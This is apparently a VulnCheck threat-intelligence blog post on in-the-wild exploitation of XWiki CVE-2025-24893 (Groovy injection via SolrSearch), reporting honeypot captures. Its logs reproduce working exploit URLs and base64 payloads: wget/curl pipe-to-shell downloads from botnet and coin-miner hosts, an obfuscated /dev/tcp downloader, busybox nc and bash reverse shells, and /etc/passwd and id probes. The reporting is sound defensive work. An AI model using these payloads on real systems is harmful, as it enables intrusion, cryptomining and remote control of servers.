Sign In
Go back

XWiki Under Increased Attack

avatar
Jacob Baines@Junior_Baines
canarycveinitial-accesskev

Key Takeaways

Since our initial publication, exploitation has expanded quickly. Multiple independent attackers are now actively targeting CVE-2025-24893.
The actor set is diverse. We’re seeing everything from botnets and coin-miners to custom tooling and bespoke scanners.
Defenders need time, and early detection is the only way to get it. VulnCheck Canaries provide that early visibility before exploitation becomes widespread.

On October 28, we published XWiki CVE-2025-24893 Exploited in the Wild detailing an attacker abusing internet-exposed XWiki servers. Two days later, on October 30, CVE-2025-24893 was added to CISA Known Exploited Vulnerabilities (KEV). Since then, we’ve observed a noticeable uptick in exploit attempts.

Canary Intelligence Observed CVE-2025-24893 Attacks (Oct. 28 - Nov. 11, 2025)

Our Canary Intelligence shows not only an increase in scanning activity but also a clear expansion of active exploitation. In the following sections, we’ll share some of what we’re seeing.

Attacks with Secondary Payload

We saw a sharp uptick in attacks when the RondoDox botnet added this vulnerability to its repertoire. The first RondoDox exploit was observed on November 3, 2025, and activity has grown steadily since.

These attacks are easily attributed to RondoDox based on its well-known HTTP User-Agent and secondary payload naming convention (rondo.<value>.sh). The associated payload servers are also well documented. For example, 74.194.191.52 can be seen below in a RondoDox exploitation of CVE-2025-24893:

{
    "src_ip": "45.153.34.156",
    "src_port": 42772,
    "src_country": "NL",
    "dst_country": "US",
    "cve": "CVE-2025-24893",
    "signature_id": 12700499,
    "signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
    "category": "Web Application Attack",
    "severity": 1,
    "payload": "R0VUIC94d2lraS9iaW4vZ2V0L01haW4vU29sclNlYXJjaD9tZWRpYT1yc3MmdGV4dD0lN0IlN0Jhc3luYyUyMGFzeW5jJTNEZmFsc2UlN0QlN0QlN0IlN0Jncm9vdnklN0QlN0QlNUIlMjdzaCUyNyUyQyUyMCUyNy1jJTI3JTJDJTIwJTI3d2dldCUyMC1xTy0lMjBodHRwJTNBJTJGJTJGNzQuMTk0LjE5MS41MiUyRnJvbmRvLnNkdS5zaCU3Q3NoJTI3JTVELmV4ZWN1dGUlMjglMjkudGV4dCU3QiU3QiUyRmdyb292eSU3RCU3RCU3QiU3QiUyRmFzeW5jJTdEJTdEIEhUVFAvMS4xDQpIb3N0OiBWQ19SRURBQ1RFRA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKGJhbmcyMDEzQGF0b21pY21haWwuaW8pDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K",
    "http": {
    "url": "/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%5B%27sh%27%2C%20%27-c%27%2C%20%27wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%7Csh%27%5D.execute%28%29.text%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D",
    "http_user_agent": "Mozilla/5.0 (bang2013@atomicmail.io)",
    "protocol": "HTTP/1.1"
    },
    "timestamp": "2025-11-12T13:24:31.044Z"
}

RondoDox isn’t the only actor exploiting this bug. Beginning on November 7, 2025, we observed 172.245.241.123 download a payload from ospwrf10ny.anondns[.]net and pipe it to bash. The payload is obfuscated. The attacker base64 encodes it, but it remains visible in the URL, as is typical with this vulnerability. Below is an example of that November 7 exploitation:

{
    "src_ip": "172.245.241.123",
    "src_port": 53672,
    "src_country": "IE",
    "dst_country": "BR",
    "cve": "CVE-2025-24893",
    "signature_id": 12700499,
    "signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
    "category": "Web Application Attack",
    "severity": 1,
    "payload": "R0VUIC9iaW4vZ2V0L01haW4vU29sclNlYXJjaD9tZWRpYT1yc3MmdGV4dD0lN0QlN0QlN0QlN0IlN0Jhc3luYyUyMGFzeW5jJTNEZmFsc2UlN0QlN0QlN0IlN0Jncm9vdnklN0QlN0RwcmludGxuJTI4JTI3ZWNobyUyMEl5RXZZbWx1TDJKaGMyZ0tablZ1WTNScGIyNGdYMTlqZFhKc0tDa2dld29nSUhKbFlXUWdMWElnY0hKdmRHOGdjMlZ5ZG1WeUlIQmhkR2dnUER3OElpUW9jSEpwYm5SbUlDY2xjeWNnSWlSN01TOHZMeThnZlNJcElnb2dJR2xtSUZzZ0lpUndjbTkwYnlJZ0lUMGdJbWgwZEhBNklpQmRPeUIwYUdWdUNpQWdJQ0J5WlhSMWNtNGdNUW9nSUdacENpQWdSRTlEUFM4a2UzQmhkR2d2THlBdkwzMEtJQ0JJVDFOVVBTUjdjMlZ5ZG1WeUx5ODZLbjBLSUNCUVQxSlVQU1I3YzJWeWRtVnlMeThxT24wS0lDQmJJQ0lrZTBoUFUxUjlJaUE5SUNJa2UxQlBVbFI5SWlCZElDWW1JRkJQVWxROU9EQUtDaUFnWlhobFl5QXpQRDRpTDJSbGRpOTBZM0F2Skh0SVQxTlVmUzhrVUU5U1ZDSUtJQ0J3Y21sdWRHWWdKMGRGVkNBbGN5QklWRlJRTHpFdU1GeHlYRzVJYjNOME9pQWxjMXh5WEc1Y2NseHVKeUFpSkh0RVQwTjlJaUFpSkh0SVQxTlVmU0lnUGlZekNpQWdLSGRvYVd4bElISmxZV1FnTFhJZ2JHbHVaVHNnWkc4S0lDQWdXeUFpSkd4cGJtVWlJRDBnSkNkY2NpY2dYU0FtSmlCaWNtVmhhd29nSUdSdmJtVWdKaVlnWTJGMEtTQThKak1LSUNCbGVHVmpJRE0lMkJKaTBLZlFwZlgyTjFjbXdnYUhSMGNEb3ZMMjl6Y0hkeVpqRXdibmt1WVc1dmJtUnVjeTV1WlhRZ2ZDQmlZWE5vQ2clM0QlM0QlMjAlN0MlMjBiYXNlNjQlMjAtZCUyMCU3QyUyMGJhc2glMjcuZXhlY3V0ZSUyOCUyOS50ZXh0JTI5JTdCJTdCL2dyb292eSU3RCU3RCU3QiU3Qi9hc3luYyU3RCU3RCBIVFRQLzEuMQ0KSG9zdDogVkNfUkVEQUNURUQNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCkFjY2VwdDogKi8qDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg==",
    "http": {
        "url": "/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%27echo%20IyEvYmluL2Jhc2gKZnVuY3Rpb24gX19jdXJsKCkgewogIHJlYWQgLXIgcHJvdG8gc2VydmVyIHBhdGggPDw8IiQocHJpbnRmICclcycgIiR7MS8vLy8gfSIpIgogIGlmIFsgIiRwcm90byIgIT0gImh0dHA6IiBdOyB0aGVuCiAgICByZXR1cm4gMQogIGZpCiAgRE9DPS8ke3BhdGgvLyAvL30KICBIT1NUPSR7c2VydmVyLy86Kn0KICBQT1JUPSR7c2VydmVyLy8qOn0KICBbICIke0hPU1R9IiA9ICIke1BPUlR9IiBdICYmIFBPUlQ9ODAKCiAgZXhlYyAzPD4iL2Rldi90Y3AvJHtIT1NUfS8kUE9SVCIKICBwcmludGYgJ0dFVCAlcyBIVFRQLzEuMFxyXG5Ib3N0OiAlc1xyXG5cclxuJyAiJHtET0N9IiAiJHtIT1NUfSIgPiYzCiAgKHdoaWxlIHJlYWQgLXIgbGluZTsgZG8KICAgWyAiJGxpbmUiID0gJCdccicgXSAmJiBicmVhawogIGRvbmUgJiYgY2F0KSA8JjMKICBleGVjIDM%2BJi0KfQpfX2N1cmwgaHR0cDovL29zcHdyZjEwbnkuYW5vbmRucy5uZXQgfCBiYXNoCg%3D%3D%20%7C%20base64%20-d%20%7C%20bash%27.execute%28%29.text%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D",
        "http_user_agent": "Mozilla/5.0",
        "protocol": "HTTP/1.1"
    },
    "timestamp": "2025-11-07T09:42:43.964Z"
}

The obfuscated payload downloads a secondary payload which in turn fetches and executes a coin miner (file hash: 03a77a556f074184b254d90e13cdd3a31efaa5a77640405e5f78aa462736acf7).

There is no lack of coin miner activity. On November 7, 2025, 156.146.56.131 fetched a secondary payload from 47.236.194.231:81 (the host is now offline). The secondary payload was executed in a second-pass exploit, as discussed in XWiki CVE-2025-24893 Exploited in the Wild.

{
    "src_ip": "156.146.56.131",
    "src_port": 45580,
    "src_country": "SG",
    "dst_country": "BR",
    "cve": "CVE-2025-24893",
    "signature_id": 12700499,
    "signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
    "category": "Web Application Attack",
    "severity": 1,
    "payload": "R0VUIC9iaW4vZ2V0L01haW4vU29sclNlYXJjaD9tZWRpYT1yc3MmdGV4dD0lN2QlN2QlN2QlN2IlN2Jhc3luYyUyMGFzeW5jJTNkZmFsc2UlN2QlN2QlN2IlN2Jncm9vdnklN2QlN2RwcmludGxuKCUyMmN1cmwlMjBodHRwOi8vNDcuMjM2LjE5NC4yMzE6ODEvc2V0dXBfcnVubnZfbWluZXIuc2glMjAtbyUyMC90bXAvMTIzLnNoJTIyLmV4ZWN1dGUoKS50ZXh0KSU3YiU3YiUyZmdyb292eSU3ZCU3ZCU3YiU3YiUyZmFzeW5jJTdkJTdkJTIwIEhUVFAvMS4xDQpIb3N0OiBWQ19SRURBQ1RFRA0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMjguMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KQ29ubmVjdGlvbjogY2xvc2UNCg0K",
    "http": {
        "url": "/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22curl%20http://47.236.194.231:81/setup_runnv_miner.sh%20-o%20/tmp/123.sh%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20",
        "http_user_agent": "python-requests/2.28.1",
        "protocol": "HTTP/1.1"
    },
    "timestamp": "2025-11-07T11:06:37.631Z"
}

The attacker from XWiki CVE-2025-24893 Exploited in the Wild, appears to have expanded their efforts. In addition to the two IP addresses documented previously, they’ve added new payload hosting servers at 185.142.33.151 and 90.156.218.31. They’re also now launching exploits from 172.206.196.45.

{
    "src_ip": "172.206.196.45",
    "src_port": 33928,
    "src_country": "US",
    "dst_country": "CA",
    "cve": "CVE-2025-24893",
    "signature_id": 12700499,
    "signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
    "category": "Web Application Attack",
    "severity": 1,
    "payload": "R0VUIC9iaW4vZ2V0L01haW4vU29sclNlYXJjaD9tZWRpYT1yc3MmdGV4dD0lN2QlN2QlN2QlN2IlN2Jhc3luYyUyMGFzeW5jJTNkZmFsc2UlN2QlN2QlN2IlN2Jncm9vdnklN2QlN2RwcmludGxuKCUyMndnZXQlMjBodHRwOi8vOTAuMTU2LjIxOC4zMTo4MDgwL1ZreTBiNEo5SzMveDY0MCUyMC1PJTIwL3RtcC9mMWM1ZiUyMi5leGVjdXRlKCkudGV4dCklN2IlN2IlMmZncm9vdnklN2QlN2QlN2IlN2IlMmZhc3luYyU3ZCU3ZCUyMCBIVFRQLzEuMQ0KSG9zdDogVkNfUkVEQUNURUQNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChNYWMgT1MgWCAxM18yKSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBFZGdlLzEyMC4wIFNhZmFyaS81MzcuMzYNCkNvbm5lY3Rpb246IGNsb3NlDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbg0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg==",
    "http": {
        "url": "/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22wget%20http://90.156.218.31:8080/Vky0b4J9K3/x640%20-O%20/tmp/f1c5f%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20",
        "http_user_agent": "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0 Safari/537.36",
        "protocol": "HTTP/1.1"
    },
    "timestamp": "2025-11-10T23:11:32.847Z"
}

Reverse Shells

We’ve also observed several reverse shell attempts. These may indicate "hands-on-keyboard" activity, or they could represent a different form of automation intended to avoid HTTP-based communication.

On October 31, 2025, 18.228.3.224 attempted to establish a reverse shell back to itself using the BusyBox nc binary. Unlike many of the addresses we’ve talked about so far, 18.228.3.224 is notable in that it's an AWS-associated IP address with no clear history of abuse. We’ll revisit this address’s scanning behavior in the next section, but it likely represents a more targeted attack.

{
    "src_ip": "18.228.3.224",
    "src_port": 37348,
    "src_country": "BR",
    "dst_country": "FR",
    "cve": "CVE-2025-24893",
    "signature_id": 12700499,
    "signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
    "category": "Web Application Attack",
    "severity": 1,
    "payload": "R0VUIC94d2lraS9iaW4vZ2V0L01haW4vU29sclNlYXJjaD9tZWRpYT1yc3MmdGV4dD0lN0QlN0QlN0IlN0Jhc3luYyUyMGFzeW5jJTNEZmFsc2UlN0QlN0QlN0IlN0Jncm9vdnklN0QlN0QlMjJidXN5Ym94JTIwbmMlMjAxOC4yMjguMy4yMjQlMjA4NDQzJTIwLWUlMjAvYmluL2Jhc2glMjIuZXhlY3V0ZSUyOCUyOSU3QiU3Qi9ncm9vdnklN0QlN0QlN0IlN0IvYXN5bmMlN0QlN0QgSFRUUC8xLjENCkhvc3Q6IFZDX1JFREFDVEVEDQpVc2VyLUFnZW50OiBweXRob24tcmVxdWVzdHMvMi4zMi40DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUsIHpzdGQNCkFjY2VwdDogKi8qDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg==",
    "http": {
        "url": "/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%22busybox%20nc%2018.228.3.224%208443%20-e%20/bin/bash%22.execute%28%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D",
        "http_user_agent": "python-requests/2.32.4",
        "protocol": "HTTP/1.1"
    },
    "timestamp": "2025-10-31T10:16:30.275Z"
}

Among the other reverse shell attempts we saw, on November 11, 2025 118.99.141.178 attempted to establish a bash reverse shell to 155.138.212.170:9001. The source host, 118.99.141.178, is notable because it exposes both QNAP and DrayTek interfaces to the internet, suggesting that this could be an exploited host. This assessment is supported by our IP Intel product, which had been tracking the address as potentially vulnerable to QNAP’s CVE-2023-47218.

{
    "src_ip": "118.99.141.178",
    "src_port": 57717,
    "src_country": "TW",
    "dest_country": "FR",
    "cve": "CVE-2025-24893",
    "signature_id": 12700499,
    "signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
    "category": "Web Application Attack",
    "severity": 1,
    "payload": "R0VUIC9iaW4vZ2V0L01haW4vU29sclNlYXJjaD9tZWRpYT1yc3MmdGV4dD0lN0QlN0QlN0QlN0IlN0Jhc3luYyUyMGFzeW5jJTNEZmFsc2UlN0QlN0QlN0IlN0Jncm9vdnklN0QlN0RwcmludGxuKCUyMiUyRmJpbiUyRmJhc2grLWkrJTNFJTI2KyUyRmRldiUyRnRjcCUyRjE1NS4xMzguMjEyLjE3MCUyRjkwMDErMCUzRSUyNjElMjIuZXhlY3V0ZSgpLnRleHQpJTdCJTdCJTJGZ3Jvb3Z5JTdEJTdEJTdCJTdCJTJGYXN5bmMlN0QlN0QgSFRUUC8xLjENCkhvc3Q6IFZDX1JFREFDVEVEDQpVc2VyLUFnZW50OiBweXRob24tcmVxdWVzdHMvMi4zMi41DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUsIHpzdGQNCkFjY2VwdDogKi8qDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg==",
    "http": {
        "url": "/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22%2Fbin%2Fbash+-i+%3E%26+%2Fdev%2Ftcp%2F155.138.212.170%2F9001+0%3E%261%22.execute().text)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D",
        "http_user_agent": "python-requests/2.32.5",
        "protocol": "HTTP/1.1"
    },
    "timestamp": "2025-11-11T11:00:14.603Z"
}

Scanners and Probing

Beyond reverse shells, plenty of actors are simply looking for targets, which is why we’ve seen a variety of scanners and probes from attackers. The most interesting one is an out-of-band application security testing (OAST)-based scanner using oast.fun, often associated with Nuclei and similar tools. This sort of traffic usually makes analysts’ eyes glaze over due to the sheer volume of internet-wide probing.

However, one oast.fun payload we captured stood out for two reasons. First, as we will see, the Nuclei template for CVE-2025-24893 doesn’t use an OAST-based check, suggesting the payload came from a less common tool. Second, the attacker, 18.228.3.224, also attempted a reverse shell (see the previous section), indicating this activity may be more deliberate than routine scanning.

{
    "src_ip": "18.228.3.224",
    "src_port": 35900,
    "src_country": "BR",
    "dst_country": "FR",
    "cve": "CVE-2025-24893",
    "signature_id": 12700499,
    "signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
    "category": "Web Application Attack",
    "severity": 1,
    "payload": "R0VUIC94d2lraS9iaW4vZ2V0L01haW4vU29sclNlYXJjaD9tZWRpYT1yc3MmdGV4dD0lN0QlN0QlN0IlN0Jhc3luYyUyMGFzeW5jJTNEZmFsc2UlN0QlN0QlN0IlN0Jncm9vdnklN0QlN0QlMjJjdXJsJTIwa3NkdXFlcWtzZ3l3bnNvaXl3c2c4OWVxbzB4cnRlbHBhLm9hc3QuZnVuLzIlMjIuZXhlY3V0ZSUyOCUyOSU3QiU3Qi9ncm9vdnklN0QlN0QlN0IlN0IvYXN5bmMlN0QlN0QgSFRUUC8xLjENCkhvc3Q6IFZDX1JFREFDVEVEDQpVc2VyLUFnZW50OiBweXRob24tcmVxdWVzdHMvMi4zMi40DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUsIHpzdGQNCkFjY2VwdDogKi8qDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg==",
    "http": {
        "url": "/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%22curl%20ksduqeqksgywnsoiywsg89eqo0xrtelpa.oast.fun/2%22.execute%28%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D",
        "http_user_agent": "python-requests/2.32.4",
        "protocol": "HTTP/1.1"
    },
    "timestamp": "2025-10-31T10:28:30.367Z"
}

Of course, we’ve seen an increase in Nuclei scans as well. The Nuclei template for CVE-2025-24893 outputs the results of cat /etc/passwd. We see quite a bit of this from many sources:

{
    "src_ip": "35.194.0.176",
    "src_port": 37256,
    "src_country": "US",
    "dst_country": "BR",
    "cve": "CVE-2025-24893",
    "signature_id": 12700499,
    "signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
    "category": "Web Application Attack",
    "severity": 1,
    "payload": "R0VUIC9iaW4vZ2V0L01haW4vU29sclNlYXJjaD9tZWRpYT1yc3MmdGV4dD0lN2QlN2QlN2QlN2IlN2Jhc3luYyUyMGFzeW5jJTNkZmFsc2UlN2QlN2QlN2IlN2Jncm9vdnklN2QlN2RwcmludGxuKCUyMmNhdCUyMC9ldGMvcGFzc3dkJTIyLmV4ZWN1dGUoKS50ZXh0KSU3YiU3YiUyZmdyb292eSU3ZCU3ZCU3YiU3YiUyZmFzeW5jJTdkJTdkJTIwIEhUVFAvMS4xDQpIb3N0OiBWQ19SRURBQ1RFRA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKE1hY2ludG9zaDsgVTsgUFBDIE1hYyBPUyBYOyBmci1jaCkgQXBwbGVXZWJLaXQvMzEyLjEuMSAoS0hUTUwsIGxpa2UgR2Vja28pIFNhZmFyaS8zMTINCkNvbm5lY3Rpb246IGNsb3NlDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbg0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQoNCg==",
    "http": {
        "url": "/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20",
        "http_user_agent": "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-ch) AppleWebKit/312.1.1 (KHTML, like Gecko) Safari/312",
        "protocol": "HTTP/1.1"
    },
    "timestamp": "2025-10-31T18:18:18.243Z"
}

We also observed probes using id, whoami, and just generic printing of “EXPLOIT_SUCCESS.” All are viable approaches, but a bit off the beaten Nuclei path.

{
    "src_ip": "186.188.17.2",
    "src_port": 46356,
    "src_country": "VE",
    "dst_country": "IN",
    "cve": "CVE-2025-24893",
    "signature_id": 12700499,
    "signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
    "category": "Web Application Attack",
    "severity": 1,
    "payload": "R0VUIC94d2lraS9iaW4vZ2V0L01haW4vU29sclNlYXJjaD9tZWRpYT1yc3MmdGV4dD0lN0QlN0QlN0QlN0IlN0Jhc3luYyUyMGFzeW5jJTNEZmFsc2UlN0QlN0QlN0IlN0Jncm9vdnklN0QlN0RwcmludGxuJTI4JTIyaWQlMjIuZXhlY3V0ZSgpLnRleHQlMjklN0IlN0IlMkZncm9vdnklN0QlN0QlN0IlN0IlMkZhc3luYyU3RCU3RCUyMCBIVFRQLzEuMQ0KSG9zdDogVkNfUkVEQUNURUQNCkFjY2VwdC1MYW5ndWFnZTogZW4tVVMsZW47cT0wLjkNClVwZ3JhZGUtSW5zZWN1cmUtUmVxdWVzdHM6IDENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChYMTE7IExpbnV4IHg4Nl82NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0MC4wLjAuMCBTYWZhcmkvNTM3LjM2DQpBY2NlcHQ6IHRleHQvaHRtbCxhcHBsaWNhdGlvbi94aHRtbCt4bWwsYXBwbGljYXRpb24veG1sO3E9MC45LGltYWdlL2F2aWYsaW1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOCxhcHBsaWNhdGlvbi9zaWduZWQtZXhjaGFuZ2U7dj1iMztxPTAuNw0KDQo=",
    "http": {
        "url": "/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22id%22.execute().text%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20",
        "http_user_agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36",
        "protocol": "HTTP/1.1"
    },
    "timestamp": "2025-11-03T13:14:03.016Z"
}

Conclusion

CVE-2025-24893 is a familiar story: one attacker moves first, and many follow. Within days of the initial exploitation, we saw botnets, miners, and opportunistic scanners all adopting the same vulnerability. Once again, this highlights the gap between exploitation in the wild and visibility at scale. By the time an issue lands in CISA KEV, attackers are already days ahead, and early detection remains the only real advantage defenders have. VulnCheck’s Canary Intelligence caught these attacks before they reached broader awareness, giving defenders a chance to respond before exploitation became widespread.

About VulnCheck

The VulnCheck research team is always on the lookout for new vulnerabilities to analyze and curate. For more research like this, see XWiki CVE-2025-24893 Exploited in the Wild, VulnCheck Research Highlights: October 2025, and New Citrix NetScaler Zero-Day Vulnerability Exploited in the Wild.

Sign up for the VulnCheck community today to get free access to our VulnCheck KEV, enjoy our comprehensive vulnerability data, and request a trial of our Initial Access Intelligence, IP Intelligence, and Exploit & Vulnerability Intelligence products.

Ready to get Started?

Explore VulnCheck, a next-generation Cyber Threat Intelligence platform, which provides exploit and vulnerability intelligence to help you prioritize and remediate vulnerabilities that matter.
  • Vulnerability Prioritization
    Prioritize vulnerabilities that matter based on the threat landscape and defer vulnerabilities that don't.
  • Early Warning System
    Real-time alerting of changes in the vulnerability landscape so that you can take action before the attacks start.
Schedule a Demo